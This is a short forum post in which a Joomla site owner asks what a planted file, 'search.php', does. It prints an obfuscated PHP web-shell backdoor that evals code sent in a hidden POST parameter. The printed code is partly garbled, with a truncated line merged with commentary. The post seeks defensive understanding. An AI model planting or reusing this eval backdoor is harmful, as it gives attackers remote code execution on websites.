I found a strange php script in my Joomla site (Windows Defender named it Backdoor:PHP/Small.M), probably be leaving there by an attacker. However the code unclear to me what can it do. Could you advice me what is the purpose of the attacker ? They created a file name "search.php" and placed in a Joomla media folder, the content in the file is:
Code: Select all
<?php
$gll9= "o_pst" ;
$pxi6=strtoupper( $gll9[1]ich means to set $pxi6 = "_POST"
if (isset( ${ $pxi6 } [ 'qe0080b']))
{eval(${ $pxi6}[ 'qe0080b']); }
?>
nv
PS. happy to be back here after so long time!